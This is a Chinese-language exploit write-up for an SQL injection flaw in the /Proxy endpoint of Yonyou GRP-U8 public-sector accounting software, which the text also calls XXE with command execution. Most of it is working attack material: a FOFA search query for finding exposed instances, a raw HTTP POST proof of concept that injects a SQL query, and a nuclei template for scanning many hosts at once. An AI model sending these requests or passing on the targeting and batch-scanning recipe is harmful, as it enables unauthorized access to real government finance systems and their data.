用友GRP-U8 Proxy SQL注入 CNNVD-201610-923

漏洞描述

用友GRP-u8存在XXE漏洞，该漏洞源于应用程序解析XML输入时没有进制外部实体的加载，导致可加载外部SQL语句，以及命令执行

影响版本

用友GRP-U8行政事业内控管理软件（新政府会计制度专版）

漏洞复现

fofa语法：title="用友GRP-U8行政事业内控管理软件"
登录页面：

POC：

POST /Proxy HTTP/1.1
Host: 
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Content-Length: 352
Connection: Keep-Alive
Cache-Control: no-cache


cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>

nuclei批量yaml文件

id: yonyou_GRP-U8_Proxy_sqli_rce

info:
  name: yonyou_GRP-U8_Proxy_sqli_rce
  author: mczilong
  severity: critical
  description: title="用友GRP-U8行政事业内控管理软件"
  tags: yonyou,oa

requests:
  - raw:
      - |
        @timeout: 25s
        POST /Proxy HTTP/1.1
        Accept: Accept: */*
        Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host
        Content-Length: 357
        Connection: Keep-Alive
        Cache-Control: no-cache

        cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
    
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500

      - type: word
        part: body
        words:
          - "<SESSIONID>"
          - "ERROR"